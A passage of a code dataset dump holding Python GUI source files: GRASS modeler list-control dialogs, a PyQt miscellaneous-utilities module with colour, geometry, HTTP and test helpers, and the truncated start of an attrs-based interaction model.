self.itemListElse.Populate(self.parent.GetModel().GetItems())\n \n self._layout()\n self.SetMinSize(self.GetSize())\n self.SetSize((500, 400))\n \n def _layout(self):\n \"\"\"!Do layout\"\"\"\n sizer = wx.BoxSizer(wx.VERTICAL)\n \n condSizer = wx.StaticBoxSizer(self.condBox, wx.VERTICAL)\n condSizer.Add(item = self.condText, proportion = 1,\n flag = wx.EXPAND)\n \n listIfSizer = wx.StaticBoxSizer(self.listBoxIf, wx.VERTICAL)\n listIfSizer.Add(item = self.itemListIf, proportion = 1,\n flag = wx.EXPAND)\n listElseSizer = wx.StaticBoxSizer(self.listBoxElse, wx.VERTICAL)\n listElseSizer.Add(item = self.itemListElse, proportion = 1,\n flag = wx.EXPAND)\n \n btnSizer = wx.StdDialogButtonSizer()\n btnSizer.AddButton(self.btnCancel)\n btnSizer.AddButton(self.btnOk)\n btnSizer.Realize()\n\n sizer.Add(item = condSizer, proportion = 0,\n flag = wx.EXPAND | wx.ALL, border = 3)\n sizer.Add(item = listIfSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 3)\n sizer.Add(item = listElseSizer, proportion = 1,\n flag = wx.EXPAND | wx.LEFT | wx.RIGHT, border = 3)\n sizer.Add(item = btnSizer, proportion=0,\n flag = wx.EXPAND | wx.ALL | wx.ALIGN_CENTER, border=5)\n \n self.panel.SetSizer(sizer)\n sizer.Fit(self.panel)\n \n self.Layout()\n\n def OnCheckItemIf(self, index, flag):\n \"\"\"!Item in if-block checked/unchecked\"\"\"\n if flag is False:\n return\n \n aId = int(self.itemListIf.GetItem(index, 0).GetText())\n if aId in self.itemListElse.GetItems()['checked']:\n self.itemListElse.CheckItemById(aId, False)\n \n def OnCheckItemElse(self, index, flag):\n \"\"\"!Item in else-block checked/unchecked\"\"\"\n if flag is False:\n return\n \n aId = int(self.itemListElse.GetItem(index, 0).GetText())\n if aId in self.itemListIf.GetItems()['checked']:\n self.itemListIf.CheckItemById(aId, False)\n \n def GetItems(self):\n \"\"\"!Get items\"\"\"\n return { 'if' : self.itemListIf.GetItems(),\n 'else' : self.itemListElse.GetItems() }\n\nclass ModelListCtrl(wx.ListCtrl,\n listmix.ListCtrlAutoWidthMixin,\n listmix.TextEditMixin,\n listmix.ColumnSorterMixin):\n def __init__(self, parent, columns, id = wx.ID_ANY,\n style = wx.LC_REPORT | wx.BORDER_NONE |\n wx.LC_SORT_ASCENDING |wx.LC_HRULES |\n wx.LC_VRULES, **kwargs):\n \"\"\"!List of model variables\"\"\"\n self.parent = parent\n self.columns = columns\n self.shape = None\n try:\n self.frame = parent.parent\n except AttributeError:\n self.frame = None\n \n wx.ListCtrl.__init__(self, parent, id = id, style = style, **kwargs)\n listmix.ListCtrlAutoWidthMixin.__init__(self)\n listmix.TextEditMixin.__init__(self)\n listmix.ColumnSorterMixin.__init__(self, 4)\n \n i = 0\n for col in columns:\n self.InsertColumn(i, col)\n self.SetColumnWidth(i, wx.LIST_AUTOSIZE_USEHEADER)\n i += 1\n \n self.itemDataMap = {} # requested by sorter\n self.itemCount = 0\n \n self.Bind(wx.EVT_LIST_BEGIN_LABEL_EDIT, self.OnBeginEdit)\n self.Bind(wx.EVT_LIST_END_LABEL_EDIT, self.OnEndEdit)\n self.Bind(wx.EVT_LIST_COL_CLICK, self.OnColClick)\n self.Bind(wx.EVT_COMMAND_RIGHT_CLICK, self.OnRightUp) #wxMSW\n self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp) #wxGTK\n \n def OnBeginEdit(self, event):\n \"\"\"!Editing of item started\"\"\"\n event.Allow()\n\n def OnEndEdit(self, event):\n \"\"\"!Finish editing of item\"\"\"\n pass\n \n def OnColClick(self, event):\n \"\"\"!Click on column header (order by)\"\"\"\n event.Skip()\n\nclass VariableListCtrl(ModelListCtrl):\n def __init__(self, parent, columns, **kwargs):\n \"\"\"!List of model variables\"\"\"\n ModelListCtrl.__init__(self, parent, columns, **kwargs)\n\n self.SetColumnWidth(2, 200) # default value\n\n def GetListCtrl(self):\n \"\"\"!Used by ColumnSorterMixin\"\"\"\n return self\n \n def GetData(self):\n \"\"\"!Get list data\"\"\"\n return self.itemDataMap\n \n def Populate(self, data):\n \"\"\"!Populate the list\"\"\"\n self.itemDataMap = dict()\n i = 0\n for name, values in data.iteritems():\n self.itemDataMap[i] = [name, values['type'],\n values.get('value', ''),\n values.get('description', '')]\n i += 1\n \n self.itemCount = len(self.itemDataMap.keys())\n self.DeleteAllItems()\n i = 0\n for name, vtype, value, desc in self.itemDataMap.itervalues():\n index = self.InsertStringItem(sys.maxint, name)\n self.SetStringItem(index, 0, name)\n self.SetStringItem(index, 1, vtype)\n self.SetStringItem(index, 2, value)\n self.SetStringItem(index, 3, desc)\n self.SetItemData(index, i)\n i += 1\n \n def Append(self, name, vtype, value, desc):\n \"\"\"!Append new item to the list\n\n @return None on success\n @return error string\n \"\"\"\n for iname, ivtype, ivalue, idesc in self.itemDataMap.itervalues():\n if iname == name:\n return _(\"Variable <%s> already exists in the model. \"\n \"Adding variable failed.\") % name\n \n index = self.InsertStringItem(sys.maxint, name)\n self.SetStringItem(index, 0, name)\n self.SetStringItem(index, 1, vtype)\n self.SetStringItem(index, 2, value)\n self.SetStringItem(index, 3, desc)\n self.SetItemData(index, self.itemCount)\n \n self.itemDataMap[self.itemCount] = [name, vtype, value, desc]\n self.itemCount += 1\n \n return None\n\n def OnRemove(self, event):\n \"\"\"!Remove selected variable(s) from the model\"\"\"\n item = self.GetFirstSelected()\n while item != -1:\n self.DeleteItem(item)\n del self.itemDataMap[item]\n item = self.GetFirstSelected()\n self.parent.UpdateModelVariables()\n \n event.Skip()\n \n def OnRemoveAll(self, event):\n \"\"\"!Remove all variable(s) from the model\"\"\"\n dlg = wx.MessageBox(parent=self,\n message=_(\"Do you want to delete all variables from \"\n \"the model?\"),\n caption=_(\"Delete variables\"),\n style=wx.YES_NO | wx.CENTRE)\n if dlg != wx.YES:\n return\n \n self.DeleteAllItems()\n self.itemDataMap = dict()\n \n self.parent.UpdateModelVariables()\n \n def OnEndEdit(self, event):\n \"\"\"!Finish editing of item\"\"\"\n itemIndex = event.GetIndex()\n columnIndex = event.GetColumn()\n nameOld = self.GetItem(itemIndex, 0).GetText()\n\n if columnIndex == 0: # TODO\n event.Veto()\n \n self.itemDataMap[itemIndex][columnIndex] = event.GetText()\n \n self.parent.UpdateModelVariables()\n\n def OnReload(self, event):\n \"\"\"!Reload list of variables\"\"\"\n self.Populate(self.parent.parent.GetModel().GetVariables())\n\n def OnRightUp(self, event):\n \"\"\"!Mouse right button up\"\"\"\n if not hasattr(self, \"popupID1\"):\n self.popupID1 = wx.NewId()\n self.popupID2 = wx.NewId()\n self.popupID3 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnRemove, id = self.popupID1)\n self.Bind(wx.EVT_MENU, self.OnRemoveAll, id = self.popupID2)\n self.Bind(wx.EVT_MENU, self.OnReload, id = self.popupID3)\n \n # generate popup-menu\n menu = wx.Menu()\n menu.Append(self.popupID1, _(\"Delete selected\"))\n menu.Append(self.popupID2, _(\"Delete all\"))\n if self.GetFirstSelected() == -1:\n menu.Enable(self.popupID1, False)\n menu.Enable(self.popupID2, False)\n \n menu.AppendSeparator()\n menu.Append(self.popupID3, _(\"Reload\"))\n \n self.PopupMenu(menu)\n menu.Destroy()\n\nclass ItemListCtrl(ModelListCtrl):\n def __init__(self, parent, columns, disablePopup = False, **kwargs):\n \"\"\"!List of model actions\"\"\"\n self.disablePopup = disablePopup\n \n ModelListCtrl.__init__(self, parent, columns, **kwargs)\n self.SetColumnWidth(1, 100)\n self.SetColumnWidth(2, 65)\n \n def GetListCtrl(self):\n \"\"\"!Used by ColumnSorterMixin\"\"\"\n return self\n \n def GetData(self):\n \"\"\"!Get list data\"\"\"\n return self.itemDataMap\n \n def Populate(self, data):\n \"\"\"!Populate the list\"\"\"\n self.itemDataMap = dict()\n \n if self.shape:\n if isinstance(self.shape, ModelCondition):\n if self.GetName() == 'ElseBlockList':\n shapeItems = map(lambda x: x.GetId(), self.shape.GetItems()['else'])\n else:\n shapeItems = map(lambda x: x.GetId(), self.shape.GetItems()['if'])\n else:\n shapeItems = map(lambda x: x.GetId(), self.shape.GetItems())\n else:\n shapeItems = list()\n \n i = 0\n if len(self.columns) == 3: # ItemCheckList\n checked = list()\n for action in data:\n if isinstance(action, ModelData) or \\\n action == self.shape:\n continue\n \n if len(self.columns) == 3:\n self.itemDataMap[i] = [str(action.GetId()),\n action.GetName(),\n action.GetLog()]\n aId = action.GetBlockId()\n if action.GetId() in shapeItems:\n checked.append(aId)\n else:\n checked.append(None)\n else:\n bId = action.GetBlockId()\n if not bId:\n bId = ''\n self.itemDataMap[i] = [str(action.GetId()),\n action.GetName(),\n ','.join(map(str, bId)),\n action.GetLog()]\n \n i += 1\n \n self.itemCount = len(self.itemDataMap.keys())\n self.DeleteAllItems()\n i = 0\n if len(self.columns) == 3:\n for aid, name, desc in self.itemDataMap.itervalues():\n index = self.InsertStringItem(sys.maxint, aid)\n self.SetStringItem(index, 0, aid)\n self.SetStringItem(index, 1, name)\n self.SetStringItem(index, 2, desc)\n self.SetItemData(index, i)\n if checked[i]:\n self.CheckItem(index, True)\n i += 1\n else:\n for aid, name, inloop, desc in self.itemDataMap.itervalues():\n index = self.InsertStringItem(sys.maxint, aid)\n self.SetStringItem(index, 0, aid)\n self.SetStringItem(index, 1, name)\n self.SetStringItem(index, 2, inloop)\n self.SetStringItem(index, 3, desc)\n self.SetItemData(index, i)\n i += 1\n \n def OnRemove(self, event):\n \"\"\"!Remove selected action(s) from the model\"\"\"\n model = self.frame.GetModel()\n canvas = self.frame.GetCanvas()\n \n item = self.GetFirstSelected()\n while item != -1:\n self.DeleteItem(item)\n del self.itemDataMap[item]\n \n aId = self.GetItem(item, 0).GetText()\n action = model.GetItem(int(aId))\n if not action:\n item = self.GetFirstSelected()\n continue\n \n model.RemoveItem(action)\n canvas.GetDiagram().RemoveShape(action)\n self.frame.ModelChanged()\n \n item = self.GetFirstSelected()\n \n canvas.Refresh()\n \n event.Skip()\n \n def OnRemoveAll(self, event):\n \"\"\"!Remove all variable(s) from the model\"\"\"\n deleteDialog = wx.MessageBox(parent=self,\n message=_(\"Selected data records (%d) will permanently deleted \"\n \"from table. Do you want to delete them?\") % \\\n (len(self.listOfSQLStatements)),\n caption=_(\"Delete records\"),\n style=wx.YES_NO | wx.CENTRE)\n if deleteDialog != wx.YES:\n return False\n \n self.DeleteAllItems()\n self.itemDataMap = dict()\n\n self.parent.UpdateModelVariables()\n\n def OnEndEdit(self, event):\n \"\"\"!Finish editing of item\"\"\"\n itemIndex = event.GetIndex()\n columnIndex = event.GetColumn()\n \n self.itemDataMap[itemIndex][columnIndex] = event.GetText()\n \n aId = int(self.GetItem(itemIndex, 0).GetText())\n action = self.frame.GetModel().GetItem(aId)\n if not action:\n event.Veto()\n if columnIndex == 0:\n action.SetId(int(event.GetText()))\n \n self.frame.ModelChanged()\n\n def OnReload(self, event = None):\n \"\"\"!Reload list of actions\"\"\"\n self.Populate(self.frame.GetModel().GetItems())\n\n def OnRightUp(self, event):\n \"\"\"!Mouse right button up\"\"\"\n if self.disablePopup:\n return\n \n if not hasattr(self, \"popupID1\"):\n self.popupID1 = wx.NewId()\n self.popupID2 = wx.NewId()\n self.popupID3 = wx.NewId()\n self.popupID4 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnRemove, id = self.popupID1)\n self.Bind(wx.EVT_MENU, self.OnRemoveAll, id = self.popupID2)\n self.Bind(wx.EVT_MENU, self.OnReload, id = self.popupID3)\n self.Bind(wx.EVT_MENU, self.OnNormalize, id = self.popupID4)\n\n # generate popup-menu\n menu = wx.Menu()\n menu.Append(self.popupID1, _(\"Delete selected\"))\n menu.Append(self.popupID2, _(\"Delete all\"))\n if self.GetFirstSelected() == -1:\n menu.Enable(self.popupID1, False)\n menu.Enable(self.popupID2, False)\n \n menu.AppendSeparator()\n menu.Append(self.popupID4, _(\"Normalize\"))\n menu.Append(self.popupID3, _(\"Reload\"))\n \n self.PopupMenu(menu)\n menu.Destroy()\n \n def OnNormalize(self, event):\n \"\"\"!Update id of actions\"\"\"\n model = self.frame.GetModel()\n \n aId = 1\n for item in model.GetItems():\n item.SetId(aId)\n aId += 1\n \n self.OnReload(None)\n self.frame.GetCanvas().Refresh()\n self.frame.ModelChanged()\n\nclass ItemCheckListCtrl(ItemListCtrl, listmix.CheckListCtrlMixin):\n def __init__(self, parent, shape, columns, window = None, **kwargs):\n self.parent = parent\n self.window = window\n \n ItemListCtrl.__init__(self, parent, columns, disablePopup = True, **kwargs)\n listmix.CheckListCtrlMixin.__init__(self)\n self.SetColumnWidth(0, 50)\n \n self.shape = shape\n \n def OnBeginEdit(self, event):\n \"\"\"!Disable editing\"\"\"\n event.Veto()\n \n def OnCheckItem(self, index, flag):\n \"\"\"!Item checked/unchecked\"\"\"\n name = self.GetName()\n if name == 'IfBlockList' and self.window:\n self.window.OnCheckItemIf(index, flag)\n elif name == 'ElseBlockList' and self.window:\n self.window.OnCheckItemElse(index, flag)\n \n def GetItems(self):\n \"\"\"!Get list of selected actions\"\"\"\n ids = { 'checked' : list(),\n 'unchecked' : list() }\n for i in range(self.GetItemCount()):\n iId = int(self.GetItem(i, 0).GetText())\n if self.IsChecked(i):\n ids['checked'].append(iId)\n else:\n ids['unchecked'].append(iId)\n \n return ids\n\n def CheckItemById(self, aId, flag):\n \"\"\"!Check/uncheck given item by id\"\"\"\n for i in range(self.GetItemCount()):\n iId = int(self.GetItem(i, 0).GetText())\n if iId == aId:\n self.CheckItem(i, flag)\n break\n","repo_name":"OSGeo/grass-legacy","sub_path":"gui/wxpython/gmodeler/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":35799,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"10828195824","text":"\"\"\"\nMiscellaneous useful methods for Python and/or Qt apps.\n\"\"\"\n\n\nfrom .pyqt import *\nimport os, os.path, time, math, collections.abc\nfrom .debug import *\n\n\n\n\n\ndef csToBool(cs):\n if cs == Qt.Checked:\n return True\n elif cs == Qt.PartiallyChecked:\n return True\n elif cs == Qt.Unchecked:\n return False\n\n# https://stackoverflow.com/questions/596216/formula-to-determine-brightness-of-rgb-color\n# https://www.w3.org/TR/AERT/#color-contrast\ndef luminanceOf(color):\n return ( 0.299 * color.redF() + 0.587 * color.greenF() + 0.114 * color.blueF() )\n\ndef isLightColor(color):\n return color.alphaF() < 1 or luminanceOf(color) >= .7\n\ndef contrastTo(color):\n if isLightColor(color):\n return QColor(Qt.black)\n else:\n return QColor(Qt.white)\n\n# https://stackoverflow.com/questions/12228548/finding-equivalent-color-with-opacity\ndef lightenOpacity(c, a):\n w = QColor('white')\n r1, g1, b1 = c.red(), c.green(), c.blue()\n r2, g2, b2 = w.red(), w.green(), w.blue()\n r3 = r2 + (r1 - r2) * a\n g3 = g2 + (g1 - g2) * a\n b3 = b2 + (b1 - b2) * a\n return QColor(int(r3), int(g3), int(b3))\n\n\n# https://www.qtcentre.org/threads/3205-Toplevel-widget-with-rounded-corners\ndef roundedRectRegion(rect, radius, parts):\n \"\"\" parts = ('bottom-left', 'top-right', ...)\n USAGE:\n self.setMask(util.roundedRectRegion(self.rect(), util.BORDER_RADIUS)) \n \"\"\"\n region = QRegion()\n # middle and borders\n region += rect.adjusted(radius, 0, -radius, 0)\n region += rect.adjusted(0, radius, 0, -radius)\n corner = QRect(QPoint(0, 0), QSize(radius * 2, radius * 2))\n if 'top-left' in parts:\n corner.moveTopLeft(rect.topLeft())\n region += QRegion(corner, QRegion.Ellipse)\n if 'top-right' in parts:\n corner.moveTopRight(rect.topRight())\n region += QRegion(corner, QRegion.Ellipse)\n if 'bottom-left' in parts:\n corner.moveBottomLeft(rect.bottomLeft())\n region += QRegion(corner, QRegion.Ellipse)\n if 'bottom-right' in parts:\n corner.moveBottomRight(rect.bottomRight())\n region += QRegion(corner, QRegion.Ellipse)\n return region\n\n\ndef deepMerge(d, u, ignore=[]):\n \"\"\" Recursively merge dict `u` in to dict `d`. \"\"\"\n if not isinstance(ignore, list):\n ignore = [ignore]\n for k, v in u.items():\n if k in ignore:\n continue\n if isinstance(v, collections.abc.Mapping) and (k in d):\n d[k] = deepMerge(d.get(k, {}), v, ignore=ignore)\n else:\n d[k] = v\n return d\n\ndef invertPixmap(p):\n img = p.toImage()\n img.invertPixels()\n return QPixmap.fromImage(img)\n\ndef rindex(lst, val, start=None):\n if start is None:\n start = len(lst)-1\n for i in xrange(start,-1,-1):\n if lst[i] == val:\n return i\n\ndef rindex(li, x):\n for i in reversed(range(len(li))):\n if li[i] == x:\n return i\n raise ValueError(\"{} is not in list\".format(x))\n\ndef suffix(s):\n if '.' in s:\n return s[s.rfind('.')+1:]\n else:\n return None\n\ndef fileName(filePath):\n return filePath[filePath.rfind(os.sep)+1:]\n\n\ndef newNameOf(items, tmpl, key):\n if not items:\n return tmpl % 1\n name = None\n for i in range(10000):\n name = tmpl % (i+1)\n found = False\n for row, item in enumerate(items):\n if key(item) == name:\n found = True\n break\n if not found:\n break\n return name\n \n\n\n\ndef printQObject(o):\n mo = o.metaObject()\n properties = []\n signals = []\n slots = []\n etc = []\n for i in range(mo.propertyCount()):\n properties.append(mo.property(i).name())\n for i in range(mo.methodCount()):\n meth = mo.method(i)\n if meth.methodType() == QMetaMethod.Signal:\n signals.append(bytes(meth.methodSignature()).decode())\n elif meth.methodType() == QMetaMethod.Slot:\n slots.append(bytes(meth.methodSignature()).decode())\n else:\n etc.append(bytes(meth.methodSignature()).decode())\n Debug(' ')\n Debug('QOBJECT:', o.__class__.__name__, 'objectName: \"%s\"' % o.objectName())\n for i in sorted(properties):\n Debug(' PROPERTY: ', i)\n for i in sorted(signals):\n Debug(' SIGNAL: ', i)\n for i in sorted(slots):\n Debug(' SLOT: ', i)\n for i in sorted(etc):\n Debug(' METHOD: ', i)\n\n\n\ndef lelide(data, length):\n return ('...' + data[len(data) - (length-4):]) if len(data) > (length-4) else data\n\ndef ljust(data, length):\n if len(data) > length:\n data = lelide(data, length)\n return data.ljust(length)\n\ndef runModel(model, silent=True, columns=None):\n WIDTH = 25\n if not silent:\n Debug('MODEL:', model.__class__.__name__, 'objectName: \"%s\"' % model.objectName())\n sys.stdout.write(' %s|' % ljust('Column', 10))\n nCols = model.columnCount()\n for col in range(model.columnCount()):\n if columns is not None and not col in columns:\n continue\n header = model.headerData(col, Qt.Horizontal)\n if not silent:\n if col < nCols-1:\n sys.stdout.write(' %s|' % ljust(header, WIDTH))\n else:\n sys.stdout.write(' %ss' % ljust(header, WIDTH))\n if not silent:\n print()\n for row in range(model.rowCount()):\n if not silent:\n sys.stdout.write(' %s|' % ljust(str(row), 10))\n for col in range(model.columnCount()):\n if columns is not None and not col in columns:\n continue\n index = model.index(row, col)\n if -1 in (index.row(), index.column()):\n raise ValueError('invalid index: row: %s, col: %s' % (row, col))\n value = model.data(index, Qt.DisplayRole)\n if not silent:\n if col < nCols-1:\n sys.stdout.write(' %s|' % ljust(str(value), WIDTH))\n else:\n sys.stdout.write(' %s' % ljust(str(value), WIDTH))\n if not silent:\n print()\n\n\ndef printModel(model, columns):\n runModel(model, silent=False, columns=columns)\n\n\n\n### Geometry functions\n\n\ndef distance(p1, p2):\n \"\"\" pythagorean \"\"\"\n a = p1.x() - p2.x()\n b = p1.y() - p2.y()\n return math.sqrt(a*a + b*b)\n\n\ndef pointOnRay(orig, dest, distance):\n \"\"\" Calculate a point on ray (orig, dest) from orig \"\"\"\n a = dest.x() - orig.x()\n b = dest.y() - orig.y()\n c = math.sqrt(pow(a, 2) + pow(b, 2)) # pythagorean\n if c > 0:\n p = distance / c\n else:\n p = 0\n return QPointF(orig.x() + p * a, orig.y() + p * b)\n\n\ndef perpendicular(pointA, pointB, reverse=False, width=None):\n \"\"\"Return pointC such that ray\n (pointC, pointB) is perpendicular to ray (pointA, pointB).\n \"\"\"\n if reverse:\n pointB, pointA = pointA, pointB\n x1 = pointA.x()\n x2 = pointB.x()\n y1 = pointA.y()\n y2 = pointB.y()\n a = x1 - x2\n b = y1 - y2\n if reverse is True:\n x3 = x2 - b\n y3 = y2 + a\n else:\n x3 = x2 + b\n y3 = y2 - a\n if width is None:\n return QPointF(x3, y3)\n else:\n return QPointF(pointOnRay(pointB, QPointF(x3, y3), width))\n\n\n# def drawTextAroundPoint(painter, x, y, flags, text, boundingRect=None):\n# size = 32767.0\n# corner = QPointF(x, y - size)\n# if flags & Qt.AlignHCenter:\n# corner.setX(corner.x() - (size / 2.0))\n# elif flags & Qt.AlignRight:\n# corner.setX(corner.x() - size)\n# if flags & Qt.AlignVCenter:\n# corner.setY(corner.y() + size / 2.0)\n# elif flags & Qt.AlignTop:\n# corner.setY(corner.y() + size)\n# else:\n# flags |= Qt.AlignBottom\n# rect = QRectF(corner.x(), corner.y(), size, size)\n# painter.drawText(rect, flags, text, boundingRect)\n\n\ndef dateOverlap(startA, endA, startB, endB):\n if (not startA and not endA) or (not startB and not endB):\n return True\n if startA is None: startA = QDate()\n if endA is None: endA = QDate()\n if startB is None: startB = QDate()\n if endB is None: endB = QDate()\n return startA <= endB and endA >= startB\n\n\n\ndef checkHTTPReply(reply):\n \"\"\" Generic http code handling. \"\"\"\n error = reply.error()\n ret = None\n if error == QNetworkReply.NoError:\n ret = True\n elif error == QNetworkReply.HostNotFoundError: # no internet connection\n Debug('No internet connection')\n ret = False\n elif error == QNetworkReply.ConnectionRefusedError:\n if IS_MOD_TEST:\n Debug('Connection refused:', reply.url().toString())\n ret = False\n elif error == QNetworkReply.ContentAccessDenied:\n Debug('Access Denied:', reply.url().toString())\n ret = False\n elif error == QNetworkReply.AuthenticationRequiredError:\n ret = True\n elif error == QNetworkReply.ContentNotFoundError:\n # if not IS_TEST:\n # Debug('404 Not Found: ' + reply.url().toString())\n ret = False\n elif error == QNetworkReply.OperationCanceledError: # reply.abort() called\n ret = False\n elif error == QNetworkReply.SslHandshakeFailedError:\n Debug('SSL handshake with server failed.')\n ret = False\n else:\n if reply.operation() == QNetworkAccessManager.HeadOperation:\n verb = 'HEAD'\n elif reply.operation() == QNetworkAccessManager.GetOperation:\n verb = 'GET'\n elif reply.operation() == QNetworkAccessManager.PutOperation:\n verb = 'PUT'\n elif reply.operation() == QNetworkAccessManager.PostOperation:\n verb = 'POST'\n elif reply.operation() == QNetworkAccessManager.DeleteOperation:\n verb = 'DELETE'\n elif reply.operation() == QNetworkAccessManager.CustomOperation:\n verb = ''\n Debug('ERROR Qt reply:') # ', error)\n Debug(' URL:', reply.request().url().toString())\n Debug(' HTTP method:', verb)\n Debug(' HTTP code:', reply.attribute(QNetworkRequest.HttpStatusCodeAttribute))\n Debug(' RESPONSE HEADERS:')\n for k, v in reply.rawHeaderPairs():\n Debug(' ', str(k), str(v))\n ret = False\n return ret\n\n\n\ndef file_md5(fpath):\n import hashlib\n if not QFileInfo(fpath).isFile():\n return\n hash_md5 = hashlib.md5()\n f = QFile(fpath)\n if not f.open(QIODevice.ReadOnly):\n Debug('Could not open file for reading:', fpath)\n return\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n\n\ndef fileEquals(filePath1, filePath2):\n if not QFileInfo(filePath1).isFile() or not QFileInfo(filePath2).isFile():\n return False\n md5_1 = file_md5(filePath1)\n md5_2 = file_md5(filePath2)\n return md5_1 == md5_2\n\n\ndef copyFileOrDir(src, dst):\n \"\"\" cp -R \"\"\"\n Debug('copyFileOrDir: +++', src)\n Debug('copyFileOrDir: ---', dst)\n if QFileInfo(src).isFile():\n if not QFileInfo(dst).isFile() or not fileEquals(src, dst):\n dest_dir = os.path.dirname(dst)\n if not os.path.isdir(dest_dir):\n os.mkdir(dest_dir)\n if QFile.copy(src, dst):\n Debug('Wrote file', dst)\n else:\n Debug('Could not write file', dst)\n else:\n dir = QDir(src)\n\n for d in dir.entryList(QDir.Dirs | QDir.NoDotAndDotDot):\n dst_path = os.path.join(dst, d)\n dir.mkpath(dst_path)\n copyFileOrDir(os.path.join(src, d), dst_path)\n\n for f in dir.entryList(QDir.Files):\n dirPath = QFileInfo(os.path.join(dst, f)).absolutePath()\n if not QDir(dirPath).exists():\n if not QDir(dirPath).mkpath(\".\"):\n Debug(\"Could not create path\", dirPath)\n continue\n # Debug('>>>')\n copyFileOrDir(os.path.join(src, f), os.path.join(dst, f))\n # Debug('<<<')\n\n\ndef qenum(base, value):\n \"\"\"Convert a Qt Enum value to its key as a string.\n\n Args:\n base: The object the enum is in, e.g. QFrame.\n value: The value to get.\n\n Return:\n The key associated with the value as a string, or None.\n \"\"\"\n klass = value.__class__\n try:\n idx = klass.staticMetaObject.indexOfEnumerator(klass.__name__)\n except AttributeError:\n idx = -1\n keyName = None\n if idx != -1:\n keyName = klass.staticMetaObject.enumerator(idx).valueToKey(value)\n else:\n for name, obj in vars(base).items():\n if isinstance(obj, klass) and obj == value:\n keyName = name\n break\n if keyName:\n return '%s.%s' % (base.__name__, keyName)\n\n\ndef shouldFullScreen():\n IS_IPHONE = bool(CUtil.instance().operatingSystem() == CUtil.OS_iPhone)\n self.here(CUtil.instance().operatingSystem(), CUtil.OS_iPhone)\n return IS_IPHONE\n\n\n\n\n#####################################################\n##\n## Dev and Test utils\n##\n#####################################################\n\n_profile = None\ndef startProfile():\n global _profile\n \n ### Std Python profiler\n import cProfile\n _profile = cProfile.Profile()\n _profile.enable()\n\n ### pyinstrument\n # import pyinstrument\n # self.profile = pyinstrument.Profiler()\n\n ### pycallgraph\n # from pycallgraph import PyCallGraph\n # from pycallgraph.output import GraphvizOutput\n # graphviz = GraphvizOutput(output_file='profile.png')\n # self.profiler = PyCallGraph(output=graphviz)\n # self.profiler.start()\n\ndef stopProfile():\n global _profile\n \n ### Std python profiler\n _profile.disable()\n import io, pstats\n s = io.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(_profile, stream=s).sort_stats(sortby)\n ps.print_stats() # ('pksampler')\n Debug(s.getvalue())\n _profile = None\n\n ### pyinstrument\n # self.profiler.stop()\n # self.here(profiler.output_text(unicode=True, color=True))\n # self.profiler = None\n\n ### pycallgraph\n # self.profiler.done()\n # self.profiler = None # saves file\n # os.system('open profile.png')\n \n\ndef wait_for_attach():\n PORT = 3001\n Debug('Waiting for debugger to attach to port %i...' % PORT)\n # import ptvsd\n # ptvsd.enable_attach(address=('127.0.0.1', PORT)) #, redirect_output=True)\n # ptvsd.wait_for_attach()\n import debugpy\n debugpy.listen(PORT)\n debugpy.wait_for_client()\n\n\nclass Condition(Debug):\n \"\"\" Allows you to wait for a signal to be called. \"\"\"\n def __init__(self, signal=None, only=None, condition=None, name=None):\n self.callCount = 0\n self.callArgs = []\n self.senders = []\n self.lastCallArgs = None\n self.only = only\n self.condition = condition\n self.name = name\n self.signal = signal\n if signal:\n signal.connect(self)\n\n def __deinit__(self):\n if self.signal:\n self.signal.disconnect(self)\n\n def reset(self):\n self.callCount = 0\n self.callArgs = []\n self.senders = []\n self.lastCallArgs = None\n\n def test(self):\n \"\"\" Return true if the condition is true. \"\"\"\n if self.condition:\n return self.condition()\n else:\n return self.callCount > 0\n\n def set(self, *args):\n \"\"\" Set the condition to true. Alias for condition(). \"\"\"\n self.callCount += 1\n self.senders.append(QObject().sender())\n self.lastCallArgs = args\n self.callArgs.append(args)\n\n def __call__(self, *args):\n \"\"\" Called by whatever signal that triggers the condition. \"\"\"\n if self.only:\n only = self.only\n if not only(*args):\n return\n self.set(*args)\n\n def wait(self, maxMS=1000, onError=None, interval=10):\n \"\"\" Wait for the condition to be true. onError is a callback. \"\"\"\n startTime = time.time()\n success = True\n app = QApplication.instance()\n while app and not self.test():\n try:\n app.processEvents(QEventLoop.WaitForMoreEvents, interval)\n except KeyboardInterrupt as e:\n if onError:\n onError()\n break\n elapsed = ((time.time() - startTime) * 1000)\n if elapsed >= maxMS:\n break\n # else:\n # time.sleep(.1) # replace with some way to release loop directly from signal\n ret = self.test()\n return ret\n\n def assertWait(self, *args, **kwargs):\n assert self.wait(*args, **kwargs) == True\n\n\n","repo_name":"patrickkidd/pkqtbridge","sub_path":"qtbridge/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":16661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71139555711","text":"import attr\nimport typing\n\n\n@attr.s\nclass Experiment:\n intended = attr.ib()\n enacted = None\n\n def __attrs_post_init__(self):\n self.enacted = list()\n\n @property\n def label(self):\n return self.intended.label.replace(\"e\", \"E\").replace(\"r\", \"R\").replace(\">\", \"|\")\n\n\n@attr.s\nclass Interaction:\n pass\n\n\n@attr.s\nclass PrimitiveInteraction(Interaction):\n label = attr.ib()\n valence = attr.ib()\n\n\n@attr.s\nclass CompositeInteraction(Interaction):\n anterior = attr.ib()\n posterior = attr.ib()\n weight = attr.ib()\n experiment = None\n\n @property\n def label(self):\n return f\"<{self.anterior.label}{self.posterior.label}>\"\n\n @property\n def valence(self):\n return self.anterior.valence + self.posterior.valence\n\n\n@attr.s\nclass Anticipation:\n experiment = attr.ib(order=False)\n proclivity = attr.ib()\n\n\n@attr.s\nclass Environment:\n interactions = dict()\n history = [None, None]\n\n def get_interaction(self, label: str, valence: int = 0) -> Interaction:\n return self.interactions.setdefault(label, PrimitiveInteraction(label, valence))\n\n def perform(self, intended: Interaction) -> Interaction:\n enacted = None\n\n if \"e1\" in intended.label:\n if (\n self.history[1] is not None\n and \"e1\" in self.history[1].label\n and (self.history[0] is None or \"e2\" in self.history[0].label)\n ):\n enacted = 